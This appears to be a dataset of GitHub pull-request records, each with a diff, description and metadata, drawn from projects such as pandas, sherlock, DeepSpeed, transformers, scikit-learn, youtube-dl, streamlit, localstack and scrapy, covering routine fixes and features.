+ "username_unclaimed": "noonewouldeverusethis7"
+ },
"CloudflareCommunity": {
"errorType": "status_code",
"url": "https://community.cloudflare.com/u/{}",
diff --git a/sites.md b/sites.md
index d3f62d728..bd8c6c522 100644
--- a/sites.md
+++ b/sites.md
@@ -1,4 +1,4 @@
-## List Of Supported Sites (353 Sites In Total!)
+## List Of Supported Sites (355 Sites In Total!)
1. [2Dimensions](https://2Dimensions.com/)
1. [3dnews](http://forum.3dnews.ru/)
1. [7Cups](https://www.7cups.com/)
@@ -225,6 +225,7 @@
1. [Slashdot](https://slashdot.org)
1. [SlideShare](https://slideshare.net/)
1. [Smule](https://www.smule.com/)
+1. [Snapchat](https://www.snapchat.com)
1. [SoundCloud](https://soundcloud.com/)
1. [SourceForge](https://sourceforge.net/)
1. [SoylentNews](https://soylentnews.org)
@@ -315,6 +316,7 @@
1. [jbzd.com.pl](https://jbzd.com.pl/)
1. [jeuxvideo](http://www.jeuxvideo.com)
1. [kofi](https://ko-fi.com)
+1. [koo](https://www.kooapp.com)
1. [kwork](https://www.kwork.ru/)
1. [labpentestit](https://lab.pentestit.ru/)
1. [last.fm](https://last.fm/)
@@ -326,6 +328,7 @@
1. [mastodon.xyz](https://mastodon.xyz/)
1. [mercadolivre](https://www.mercadolivre.com.br)
1. [metacritic](https://www.metacritic.com/)
+1. [minds](https://www.minds.com)
1. [moikrug](https://moikrug.ru/)
1. [mstdn.io](https://mstdn.io/)
1. [nairaland.com](https://www.nairaland.com/)
@@ -350,5 +353,4 @@
1. [xHamster](https://xhamster.com)
1. [znanylekarz.pl](https://znanylekarz.pl)
1. [zoomit](https://www.zoomit.ir)
-1. [koo](https://www.kooapp.com)
-1. [minds](https://www.minds.com)
+1. [Chess](https://www.chess.com/)
| Added Chess.com back by fixing the false positive issue it had earlier. | https://api.github.com/repos/sherlock-project/sherlock/pulls/1418 | 2022-07-20T16:13:36Z | 2022-07-20T16:15:42Z | 2022-07-20T16:15:42Z | 2022-09-08T15:19:48Z | 1,316 | sherlock-project/sherlock | 36,562 |
implement ensure_localized in datetimelikeArrayMixin | diff --git a/pandas/core/arrays/datetimelike.py b/pandas/core/arrays/datetimelike.py
index 6d8e41900ce2d..c01b04991e52b 100644
--- a/pandas/core/arrays/datetimelike.py
+++ b/pandas/core/arrays/datetimelike.py
@@ -1079,6 +1079,41 @@ def _evaluate_compare(self, other, op):
result[mask] = filler
return result
+ def _ensure_localized(self, arg, ambiguous='raise', nonexistent='raise',
+ from_utc=False):
+ """
+ Ensure that we are re-localized.
+
+ This is for compat as we can then call this on all datetimelike
+ arrays generally (ignored for Period/Timedelta)
+
+ Parameters
+ ----------
+ arg : Union[DatetimeLikeArray, DatetimeIndexOpsMixin, ndarray]
+ ambiguous : str, bool, or bool-ndarray, default 'raise'
+ nonexistent : str, default 'raise'
+ from_utc : bool, default False
+ If True, localize the i8 ndarray to UTC first before converting to
+ the appropriate tz. If False, localize directly to the tz.
+
+ Returns
+ -------
+ localized array
+ """
+
+ # reconvert to local tz
+ tz = getattr(self, 'tz', None)
+ if tz is not None:
+ if not isinstance(arg, type(self)):
+ arg = self._simple_new(arg)
+ if from_utc:
+ arg = arg.tz_localize('UTC').tz_convert(self.tz)
+ else:
+ arg = arg.tz_localize(
+ self.tz, ambiguous=ambiguous, nonexistent=nonexistent
+ )
+ return arg
+
DatetimeLikeArrayMixin._add_comparison_ops()
diff --git a/pandas/core/indexes/datetimelike.py b/pandas/core/indexes/datetimelike.py
index dd2537c11a94c..db0cb88b06b2b 100644
--- a/pandas/core/indexes/datetimelike.py
+++ b/pandas/core/indexes/datetimelike.py
@@ -111,36 +111,17 @@ def _evaluate_compare(self, other, op):
def _ensure_localized(self, arg, ambiguous='raise', nonexistent='raise',
from_utc=False):
- """
- Ensure that we are re-localized.
-
- This is for compat as we can then call this on all datetimelike
- indexes generally (ignored for Period/Timedelta)
-
- Parameters
- ----------
- arg : DatetimeIndex / i8 ndarray
- ambiguous : str, bool, or bool-ndarray, default 'raise'
- nonexistent : str, default 'raise'
- from_utc : bool, default False
- If True, localize the i8 ndarray to UTC first before converting to
- the appropriate tz. If False, localize directly to the tz.
-
- Returns
- -------
- localized DTI
- """
-
- # reconvert to local tz
- if getattr(self, 'tz', None) is not None:
- if not isinstance(arg, ABCIndexClass):
- arg = self._simple_new(arg)
- if from_utc:
- arg = arg.tz_localize('UTC').tz_convert(self.tz)
- else:
- arg = arg.tz_localize(
- self.tz, ambiguous=ambiguous, nonexistent=nonexistent
- )
+ # See DatetimeLikeArrayMixin._ensure_localized.__doc__
+
+ if getattr(self, 'tz', None):
+ # ensure_localized is only relevant for tz-aware DTI
+ from pandas.core.arrays import DatetimeArrayMixin as DatetimeArray
+ dtarr = DatetimeArray(self)
+ result = dtarr._ensure_localized(arg,
+ ambiguous=ambiguous,
+ nonexistent=nonexistent,
+ from_utc=from_utc)
+ return type(self)(result, name=self.name)
return arg
def _box_values_as_index(self):
| This method is used by `TimelikeOps._round`, so needs to be implemented on the array mixin before we can move forward on #24064.
@TomAugspurger this places the method in a different location than you did in #24024 and made a small docstring edit, but otherwise should be compatible. | https://api.github.com/repos/pandas-dev/pandas/pulls/24378 | 2018-12-21T03:24:02Z | 2018-12-21T16:31:23Z | 2018-12-21T16:31:23Z | 2020-04-05T17:43:39Z | 917 | pandas-dev/pandas | 45,763 |
Import ABC from collections.abc for Python 3.10 compatibility. | diff --git a/deepspeed/autotuning/tuner/utils.py b/deepspeed/autotuning/tuner/utils.py
index bf1f51f34de6..f87c7563966a 100755
--- a/deepspeed/autotuning/tuner/utils.py
+++ b/deepspeed/autotuning/tuner/utils.py
@@ -1,7 +1,7 @@
import numpy as np
import itertools
from ..utils import *
-import collections
+import collections.abc
def index_to_feature(p, dims):
@@ -53,7 +53,7 @@ def flatten(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
- if isinstance(v, collections.MutableMapping):
+ if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
diff --git a/deepspeed/runtime/config_utils.py b/deepspeed/runtime/config_utils.py
index 199c773f4379..83c48bbee5cb 100755
--- a/deepspeed/runtime/config_utils.py
+++ b/deepspeed/runtime/config_utils.py
@@ -7,6 +7,7 @@
"""
import json
import collections
+import collections.abc
# adapted from https://stackoverflow.com/a/50701137/9201239
@@ -31,13 +32,13 @@ def iterencode(self, o, _one_shot=False, level=0):
return f"{o:e}"
else:
return f"{o}"
- elif isinstance(o, collections.Mapping):
+ elif isinstance(o, collections.abc.Mapping):
x = [
f'\n{prefix}"{k}": {self.iterencode(v, level=level)}' for k,
v in o.items()
]
return "{" + ', '.join(x) + f"\n{prefix_close}" + "}"
- elif isinstance(o, collections.Sequence) and not isinstance(o, str):
+ elif isinstance(o, collections.abc.Sequence) and not isinstance(o, str):
return f"[{ f', '.join(map(self.iterencode, o)) }]"
return "\n, ".join(super().iterencode(o, _one_shot))
| Import ABC directly from `collections` was deprecated and removed in Python 3.10. Import from `collections.abc` for Python 3.10 compatibility. | https://api.github.com/repos/microsoft/DeepSpeed/pulls/1851 | 2022-03-22T06:54:52Z | 2022-03-23T17:36:00Z | 2022-03-23T17:36:00Z | 2022-03-23T17:36:00Z | 508 | microsoft/DeepSpeed | 10,311 |
Fix gradient checkpointing bug in xglm | diff --git a/src/transformers/models/xglm/modeling_xglm.py b/src/transformers/models/xglm/modeling_xglm.py
index d8e9952ee7984..b9cef18efc7e1 100755
--- a/src/transformers/models/xglm/modeling_xglm.py
+++ b/src/transformers/models/xglm/modeling_xglm.py
@@ -714,6 +714,14 @@ def forward(
hidden_states = nn.functional.dropout(hidden_states, p=float(self.dropout), training=self.training)
+ if self.gradient_checkpointing and self.training:
+ if use_cache:
+ logger.warning_once(
+ "`use_cache = True` is incompatible with gradient checkpointing`. Setting `use_cache ="
+ " False`..."
+ )
+ use_cache = False
+
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
@@ -739,12 +747,6 @@ def forward(
past_key_value = past_key_values[idx] if past_key_values is not None else None
if self.gradient_checkpointing and self.training:
- if use_cache:
- logger.warning(
- "`use_cache = True` is incompatible with gradient checkpointing`. Setting `use_cache ="
- " False`..."
- )
- use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
| This PR fixes a bug that a user can encounter while using generate and models that use gradient_checkpointing.
Fixes Issue https://github.com/huggingface/transformers/issues/21737
cc @younesbelkada or @gante | https://api.github.com/repos/huggingface/transformers/pulls/22127 | 2023-03-13T12:53:46Z | 2023-03-13T13:49:23Z | 2023-03-13T13:49:23Z | 2023-03-13T13:52:02Z | 317 | huggingface/transformers | 11,942 |
FIX: Python3 compatibility. | diff --git a/tokenization_test.py b/tokenization_test.py
index 8a46028ef..0d6d39494 100644
--- a/tokenization_test.py
+++ b/tokenization_test.py
@@ -31,7 +31,11 @@ def test_full_tokenizer(self):
"##ing", ","
]
with tempfile.NamedTemporaryFile(delete=False) as vocab_writer:
- vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
+ import six
+ if six.PY2:
+ vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
+ else:
+ vocab_writer.write("".join([x + "\n" for x in vocab_tokens]).encode("utf-8"))
vocab_file = vocab_writer.name
| See [this issue](https://github.com/google-research/bert/issues/269) | https://api.github.com/repos/google-research/bert/pulls/274 | 2018-12-15T17:51:50Z | 2018-12-18T18:25:08Z | 2018-12-18T18:25:08Z | 2018-12-18T18:25:08Z | 177 | google-research/bert | 38,440 |
R.3: Fill in placeholder link | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index 0a09b42a3..4df85493e 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -9533,7 +9533,7 @@ Returning a (raw) pointer imposes a lifetime management uncertainty on the calle
delete p;
}
-In addition to suffering from the problem from [leak](#???), this adds a spurious allocation and deallocation operation, and is needlessly verbose. If Gadget is cheap to move out of a function (i.e., is small or has an efficient move operation), just return it "by value" (see ["out" return values](#Rf-out)):
+In addition to suffering from the problem of [leak](#Rp-leak), this adds a spurious allocation and deallocation operation, and is needlessly verbose. If Gadget is cheap to move out of a function (i.e., is small or has an efficient move operation), just return it "by value" (see ["out" return values](#Rf-out)):
Gadget make_gadget(int n)
{
| The placeholder link should lead to #Rp-leak. | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/2173 | 2024-01-20T13:29:12Z | 2024-04-04T17:07:33Z | 2024-04-04T17:07:33Z | 2024-04-04T17:07:34Z | 257 | isocpp/CppCoreGuidelines | 15,830 |
replay: just load one segment to start replaying | diff --git a/selfdrive/ui/replay/replay.cc b/selfdrive/ui/replay/replay.cc
index caa63fd5e90589..5b0f854acbe429 100644
--- a/selfdrive/ui/replay/replay.cc
+++ b/selfdrive/ui/replay/replay.cc
@@ -128,11 +128,16 @@ void Replay::queueSegment() {
// get the current segment window
SegmentMap::iterator begin, cur, end;
begin = cur = end = segments_.lower_bound(current_segment_);
- for (int i = 0; i < BACKWARD_SEGS && begin != segments_.begin(); ++i) {
- --begin;
- }
- for (int i = 0; i <= FORWARD_SEGS && end != segments_.end(); ++i) {
- ++end;
+ if (cur != segments_.end() && cur->second == nullptr) {
+ // just load one segment on starting replay or seeking
+ end++;
+ } else {
+ for (int i = 0; i < BACKWARD_SEGS && begin != segments_.begin(); ++i) {
+ --begin;
+ }
+ for (int i = 0; i <= FORWARD_SEGS && end != segments_.end(); ++i) {
+ ++end;
+ }
}
// load & merge segments
| just load one segment (on starting or seeking) to start the replay, then load other segments right after replay started.
| https://api.github.com/repos/commaai/openpilot/pulls/22598 | 2021-10-18T11:27:34Z | 2021-10-18T19:03:34Z | 2021-10-18T19:03:34Z | 2021-10-18T19:12:53Z | 302 | commaai/openpilot | 9,176 |
[MRG+1] Fix #10229: check_array should fail if array has strings | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 46898954944da..52c1a8821b143 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -335,6 +335,12 @@ Feature Extraction
(words or n-grams). :issue:`9147` by :user:`Claes-Fredrik Mannby <mannby>`
and `Roman Yurchak`_.
+Utils
+
+- :func:`utils.validation.check_array` yield a ``FutureWarning`` indicating
+ that arrays of bytes/strings will be interpreted as decimal numbers
+ beginning in version 0.22. :issue:`10229` by :user:`Ryan Lee <rtlee9>`
+
Preprocessing
- Fixed bugs in :class:`preprocessing.LabelEncoder` which would sometimes throw
diff --git a/sklearn/utils/tests/test_validation.py b/sklearn/utils/tests/test_validation.py
index 2f134d33c3e40..95f5841ac80ba 100644
--- a/sklearn/utils/tests/test_validation.py
+++ b/sklearn/utils/tests/test_validation.py
@@ -285,6 +285,42 @@ def test_check_array():
result = check_array(X_no_array)
assert_true(isinstance(result, np.ndarray))
+ # deprecation warning if string-like array with dtype="numeric"
+ X_str = [['a', 'b'], ['c', 'd']]
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, X_str, "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_str, dtype='U'), "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_str, dtype='S'), "numeric")
+
+ # deprecation warning if byte-like array with dtype="numeric"
+ X_bytes = [[b'a', b'b'], [b'c', b'd']]
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, X_bytes, "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_bytes, dtype='V1'), "numeric")
+
def test_check_array_pandas_dtype_object_conversion():
# test that data-frame like objects with dtype object
diff --git a/sklearn/utils/validation.py b/sklearn/utils/validation.py
index d47c61202332f..70e968ee6d36b 100644
--- a/sklearn/utils/validation.py
+++ b/sklearn/utils/validation.py
@@ -516,6 +516,15 @@ def check_array(array, accept_sparse=False, dtype="numeric", order=None,
# To ensure that array flags are maintained
array = np.array(array, dtype=dtype, order=order, copy=copy)
+ # in the future np.flexible dtypes will be handled like object dtypes
+ if dtype_numeric and np.issubdtype(array.dtype, np.flexible):
+ warnings.warn(
+ "Beginning in version 0.22, arrays of strings will be "
+ "interpreted as decimal numbers if parameter 'dtype' is "
+ "'numeric'. It is recommended that you convert the array to "
+ "type np.float64 before passing it to check_array.",
+ FutureWarning)
+
# make sure we actually converted to numeric:
if dtype_numeric and array.dtype.kind == "O":
array = array.astype(np.float64)
| <!--
Thanks for contributing a pull request! Please ensure you have taken a look at
the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/master/CONTRIBUTING.md#pull-request-checklist
-->
#### Reference Issues/PRs
<!--
Example: Fixes #1234. See also #3456.
Please use keywords (e.g., Fixes) to create link to the issues or pull requests
you resolved, so that they will automatically be closed when your pull request
is merged. See https://github.com/blog/1506-closing-issues-via-pull-requests
-->
Fixes #10229
#### What does this implement/fix? Explain your changes.
Adds a deprecation warning if a non-object string-like array (defined as being a subdtype of `np.flexible`) is passed to `check_array` with `dtype="numeric"`. Arrays with object, boolean, and number dtypes are handled as before.
#### Any other comments?
The added deprecation warning indicates that non-object string-like arrays will be handled as object arrays are currently handled, i.e., attempted to be converted to `np.float64`. It seems intuitive to me to treat all string-like arrays (object + flexible) the same, but please let me know if you prefer any alternatives.
For reference: [numpy scalar dtypes](https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html)
<!--
Please be aware that we are a loose team of volunteers so patience is
necessary; assistance handling other issues is very welcome. We value
all user contributions, no matter how minor they are. If we are slow to
review, either the pull request needs some benchmarking, tinkering,
convincing, etc. or more likely the reviewers are simply busy. In either
case, we ask for your understanding during the review process.
For more information, see our FAQ on this topic:
http://scikit-learn.org/dev/faq.html#why-is-my-pull-request-not-getting-any-attention.
Thanks for contributing!
-->
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/10495 | 2018-01-18T03:11:24Z | 2018-02-22T13:08:53Z | 2018-02-22T13:08:53Z | 2018-07-17T09:24:34Z | 1,038 | scikit-learn/scikit-learn | 46,370 |
[vlive] New extractor for vlive.tv | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index 1c53a5632df..6bee5b63cc4 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -735,6 +735,7 @@
VKIE,
VKUserVideosIE,
)
+from .vlive import VLiveIE
from .vodlocker import VodlockerIE
from .voicerepublic import VoiceRepublicIE
from .vporn import VpornIE
diff --git a/youtube_dl/extractor/vlive.py b/youtube_dl/extractor/vlive.py
new file mode 100644
index 00000000000..a456f8217f0
--- /dev/null
+++ b/youtube_dl/extractor/vlive.py
@@ -0,0 +1,86 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import hmac
+from hashlib import sha1
+from base64 import b64encode
+from time import time
+
+from .common import InfoExtractor
+from ..utils import (
+ ExtractorError,
+ determine_ext
+)
+from ..compat import compat_urllib_parse
+
+
+class VLiveIE(InfoExtractor):
+ IE_NAME = 'vlive'
+ # www.vlive.tv/video/ links redirect to m.vlive.tv/video/ for mobile devices
+ _VALID_URL = r'https?://(?:(www|m)\.)?vlive\.tv/video/(?P<id>[0-9]+)'
+ _TEST = {
+ 'url': 'http://m.vlive.tv/video/1326',
+ 'md5': 'cc7314812855ce56de70a06a27314983',
+ 'info_dict': {
+ 'id': '1326',
+ 'ext': 'mp4',
+ 'title': '[V] Girl\'s Day\'s Broadcast',
+ 'creator': 'Girl\'s Day',
+ },
+ }
+ _SECRET = 'rFkwZet6pqk1vQt6SxxUkAHX7YL3lmqzUMrU4IDusTo4jEBdtOhNfT4BYYAdArwH'
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+
+ webpage = self._download_webpage(
+ 'http://m.vlive.tv/video/%s' % video_id,
+ video_id, note='Download video page')
+
+ title = self._og_search_title(webpage)
+ thumbnail = self._og_search_thumbnail(webpage)
+ creator = self._html_search_regex(
+ r'<span[^>]+class="name">([^<>]+)</span>', webpage, 'creator')
+
+ url = 'http://global.apis.naver.com/globalV/globalV/vod/%s/playinfo?' % video_id
+ msgpad = '%.0f' % (time() * 1000)
+ md = b64encode(
+ hmac.new(self._SECRET.encode('ascii'),
+ (url[:255] + msgpad).encode('ascii'), sha1).digest()
+ )
+ url += '&' + compat_urllib_parse.urlencode({'msgpad': msgpad, 'md': md})
+ playinfo = self._download_json(url, video_id, 'Downloading video json')
+
+ if playinfo.get('message', '') != 'success':
+ raise ExtractorError(playinfo.get('message', 'JSON request unsuccessful'))
+
+ if not playinfo.get('result'):
+ raise ExtractorError('No videos found.')
+
+ formats = []
+ for vid in playinfo['result'].get('videos', {}).get('list', []):
+ formats.append({
+ 'url': vid['source'],
+ 'ext': 'mp4',
+ 'abr': vid.get('bitrate', {}).get('audio'),
+ 'vbr': vid.get('bitrate', {}).get('video'),
+ 'format_id': vid['encodingOption']['name'],
+ 'height': vid.get('height'),
+ 'width': vid.get('width'),
+ })
+ self._sort_formats(formats)
+
+ subtitles = {}
+ for caption in playinfo['result'].get('captions', {}).get('list', []):
+ subtitles[caption['language']] = [
+ {'ext': determine_ext(caption['source'], default_ext='vtt'),
+ 'url': caption['source']}]
+
+ return {
+ 'id': video_id,
+ 'title': title,
+ 'creator': creator,
+ 'thumbnail': thumbnail,
+ 'formats': formats,
+ 'subtitles': subtitles,
+ }
| "V" http://www.vlive.tv is a live broadcasting mobile platform targeted at South Korean celebrities
Similar to Periscope, videos are available for viewing after the live broadcast, but only on the app for now.
Example: http://m.vlive.tv/video/1326
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/6621 | 2015-08-20T05:07:05Z | 2015-09-05T07:42:07Z | 2015-09-05T07:42:07Z | 2015-09-05T07:42:22Z | 1,073 | ytdl-org/youtube-dl | 50,076 |
feat(starfish): Add VCD measurement to Starfish spans table component | diff --git a/static/app/views/starfish/views/spans/spansTable.tsx b/static/app/views/starfish/views/spans/spansTable.tsx
index 83d0e633e26f2..e522f8b9408e8 100644
--- a/static/app/views/starfish/views/spans/spansTable.tsx
+++ b/static/app/views/starfish/views/spans/spansTable.tsx
@@ -13,6 +13,7 @@ import {Organization} from 'sentry/types';
import {EventsMetaType} from 'sentry/utils/discover/eventView';
import {getFieldRenderer} from 'sentry/utils/discover/fieldRenderers';
import type {Sort} from 'sentry/utils/discover/fields';
+import {VisuallyCompleteWithData} from 'sentry/utils/performanceForSentry';
import {decodeScalar} from 'sentry/utils/queryString';
import {useLocation} from 'sentry/utils/useLocation';
import useOrganization from 'sentry/utils/useOrganization';
@@ -98,24 +99,30 @@ export default function SpansTable({
return (
<Fragment>
- <GridEditable
+ <VisuallyCompleteWithData
+ id="SpansTable"
+ hasData={data.length > 0}
isLoading={isLoading}
- data={data as Row[]}
- columnOrder={columnOrder ?? getColumns(moduleName)}
- columnSortBy={[
- {
- key: sort.field,
- order: sort.kind,
- },
- ]}
- grid={{
- renderHeadCell: column => renderHeadCell({column, sort, location}),
- renderBodyCell: (column, row) =>
- renderBodyCell(column, row, meta, location, organization, endpoint, method),
- }}
- location={location}
- />
- <Pagination pageLinks={pageLinks} onCursor={handleCursor} />
+ >
+ <GridEditable
+ isLoading={isLoading}
+ data={data as Row[]}
+ columnOrder={columnOrder ?? getColumns(moduleName)}
+ columnSortBy={[
+ {
+ key: sort.field,
+ order: sort.kind,
+ },
+ ]}
+ grid={{
+ renderHeadCell: column => renderHeadCell({column, sort, location}),
+ renderBodyCell: (column, row) =>
+ renderBodyCell(column, row, meta, location, organization, endpoint, method),
+ }}
+ location={location}
+ />
+ <Pagination pageLinks={pageLinks} onCursor={handleCursor} />
+ </VisuallyCompleteWithData>
</Fragment>
);
}
| The component fetches its own data (for now), so I wanted to add some measurements here. I think there's a good chance the data loading strategy will change soon, but this is a start.
| https://api.github.com/repos/getsentry/sentry/pulls/51905 | 2023-06-29T19:15:27Z | 2023-06-29T19:31:02Z | 2023-06-29T19:31:02Z | 2024-03-15T21:08:13Z | 573 | getsentry/sentry | 44,095 |
add: fibonnaci_simplified version. | diff --git a/fibonacci_SIMPLIFIED b/fibonacci_SIMPLIFIED
new file mode 100644
index 0000000000..77f6854050
--- /dev/null
+++ b/fibonacci_SIMPLIFIED
@@ -0,0 +1,10 @@
+
+#printing fibonnaci series till nth element - simplified version for begginers
+def print_fibonacci(n):
+ current_no = 1
+ prev_no = 0
+ for i in range(n):
+ print(current_no, end = " ")
+ prev_no,current_no = current_no, current_no + prev_no
+
+print_fibonacci(10)
| https://api.github.com/repos/geekcomputers/Python/pulls/2078 | 2024-01-07T09:22:47Z | 2024-01-07T21:29:04Z | 2024-01-07T21:29:04Z | 2024-01-07T21:29:04Z | 148 | geekcomputers/Python | 31,170 | |
Decrease Tornado WebSocket ping_interval to 1s | diff --git a/lib/streamlit/server/server.py b/lib/streamlit/server/server.py
index 239280790002..698daa9832d0 100644
--- a/lib/streamlit/server/server.py
+++ b/lib/streamlit/server/server.py
@@ -69,10 +69,19 @@
TORNADO_SETTINGS = {
- "compress_response": True, # Gzip HTTP responses.
- "websocket_ping_interval": 20, # Ping every 20s to keep WS alive.
- "websocket_ping_timeout": 30, # Pings should be responded to within 30s.
- "websocket_max_message_size": MESSAGE_SIZE_LIMIT, # Up the WS size limit.
+ # Gzip HTTP responses.
+ "compress_response": True,
+ # Ping every 1s to keep WS alive.
+ # 2021.06.22: this value was previously 20s, and was causing
+ # connection instability for a small number of users. This smaller
+ # ping_interval fixes that instability.
+ # https://github.com/streamlit/streamlit/issues/3196
+ "websocket_ping_interval": 1,
+ # If we don't get a ping response within 30s, the connection
+ # is timed out.
+ "websocket_ping_timeout": 30,
+ # Set the websocket message size. The default value is too low.
+ "websocket_max_message_size": MESSAGE_SIZE_LIMIT,
}
| Fixes https://github.com/streamlit/streamlit/issues/3196
I ran some tests with a simulated super-high-latency/low-bandwidth connection, and didn't run into any issues. | https://api.github.com/repos/streamlit/streamlit/pulls/3464 | 2021-06-22T20:30:54Z | 2021-06-23T14:36:47Z | 2021-06-23T14:36:47Z | 2021-07-24T00:37:24Z | 320 | streamlit/streamlit | 22,084 |
Change to SPDX conform license string | diff --git a/requests/__version__.py b/requests/__version__.py
index 5063c3f8ee..d206427e50 100644
--- a/requests/__version__.py
+++ b/requests/__version__.py
@@ -9,6 +9,6 @@
__build__ = 0x023100
__author__ = "Kenneth Reitz"
__author_email__ = "me@kennethreitz.org"
-__license__ = "Apache 2.0"
+__license__ = "Apache-2.0"
__copyright__ = "Copyright Kenneth Reitz"
__cake__ = "\u2728 \U0001f370 \u2728"
| I suggest to change the license string in the package information to an [SPDX parsable license expression](https://spdx.org/licenses/).
This makes it easier for downstream users to get the license information directly from the package metadata. | https://api.github.com/repos/psf/requests/pulls/6266 | 2022-10-23T18:37:01Z | 2023-08-12T18:51:42Z | 2023-08-12T18:51:42Z | 2023-08-12T18:51:42Z | 154 | psf/requests | 32,418 |
fix invalid access to thread-local access key ID | diff --git a/localstack/aws/handlers/auth.py b/localstack/aws/handlers/auth.py
index 47e36bef89198..ee471ab6a69c2 100644
--- a/localstack/aws/handlers/auth.py
+++ b/localstack/aws/handlers/auth.py
@@ -28,7 +28,9 @@ def __call__(self, chain: HandlerChain, context: RequestContext, response: Respo
headers = context.request.headers
if not headers.get("Authorization"):
- headers["Authorization"] = aws_stack.mock_aws_request_headers(api)["Authorization"]
+ headers["Authorization"] = aws_stack.mock_aws_request_headers(
+ api, access_key="injectedaccesskey"
+ )["Authorization"]
class AccountIdEnricher(Handler):
diff --git a/tests/integration/s3/test_s3_cors.py b/tests/integration/s3/test_s3_cors.py
index a55e921da9c43..728e02284772b 100644
--- a/tests/integration/s3/test_s3_cors.py
+++ b/tests/integration/s3/test_s3_cors.py
@@ -66,7 +66,6 @@ def _match(key: str, response: requests.Response):
@pytest.mark.skipif(condition=LEGACY_S3_PROVIDER, reason="Tests are for new ASF provider")
-@pytest.mark.xfail(reason="xfail tests for now as they are failing") # TODO: reactivate ASAP
class TestS3Cors:
@pytest.mark.aws_validated
def test_cors_http_options_no_config(self, s3_bucket, snapshot, aws_client):
| Recently, a CORS test continuously fails in CI, while it is not reproducible locally:
This PR aims at fixing this issue and unblocking the community pipeline.
This happens by disabling access to the threadlocal stored access key id before it is being set in the Authorization Header Injector.
Edit: It turns out that the flaky tests were caused by an invalid fallback to a thread-local. Details can be found in the great writeup of @dfangl: https://github.com/localstack/localstack/pull/8134#issuecomment-1512906567
This was an absolute great catch, thanks @dfangl and @bentsku for digging into this! | https://api.github.com/repos/localstack/localstack/pulls/8134 | 2023-04-13T10:11:57Z | 2023-04-18T15:04:24Z | 2023-04-18T15:04:24Z | 2023-04-18T15:04:48Z | 353 | localstack/localstack | 28,666 |
Add Telnet console authentication docs | diff --git a/docs/topics/telnetconsole.rst b/docs/topics/telnetconsole.rst
index ce79c9f3535..49c372598fb 100644
--- a/docs/topics/telnetconsole.rst
+++ b/docs/topics/telnetconsole.rst
@@ -26,8 +26,21 @@ The telnet console listens in the TCP port defined in the
the console you need to type::
telnet localhost 6023
+ Trying localhost...
+ Connected to localhost.
+ Escape character is '^]'.
+ Username:
+ Password:
>>>
-
+
+By default Username is ``scrapy`` and Password is autogenerated. The
+autogenerated Password can be seen on scrapy logs like the example bellow::
+
+ 2018-10-16 14:35:21 [scrapy.extensions.telnet] INFO: Telnet Password: 16f92501e8a59326
+
+Default Username and Password can be overriden by the settings
+:setting:`TELNETCONSOLE_USERNAME` and :setting:`TELNETCONSOLE_PASSWORD`
+
You need the telnet program which comes installed by default in Windows, and
most Linux distros.
@@ -160,3 +173,24 @@ Default: ``'127.0.0.1'``
The interface the telnet console should listen on
+
+.. setting:: TELNETCONSOLE_USERNAME
+
+TELNETCONSOLE_USERNAME
+------------------
+
+Default: ``'scrapy'``
+
+The username used for the telnet console
+
+
+.. setting:: TELNETCONSOLE_PASSWORD
+
+TELNETCONSOLE_PASSWORD
+------------------
+
+Default: ``None``
+
+The password used for the telnet console, default behaviour is to have it
+autogenerated
+
| https://api.github.com/repos/scrapy/scrapy/pulls/3465 | 2018-10-16T17:51:29Z | 2018-10-16T18:08:34Z | 2018-10-16T18:08:34Z | 2018-10-16T18:08:35Z | 397 | scrapy/scrapy | 34,457 | |
Fix broken link in docs of DataFrame.to_hdf | diff --git a/pandas/core/generic.py b/pandas/core/generic.py
index c3db8ef58deb6..eee5f72a05738 100644
--- a/pandas/core/generic.py
+++ b/pandas/core/generic.py
@@ -2576,7 +2576,7 @@ def to_hdf(
See Also
--------
- DataFrame.read_hdf : Read from HDF file.
+ read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
| The link in https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_hdf.html in "See also" seems to be broken. This should fix it.
- [ ] closes #xxxx
- [ ] tests added / passed
- [x] passes `black pandas`
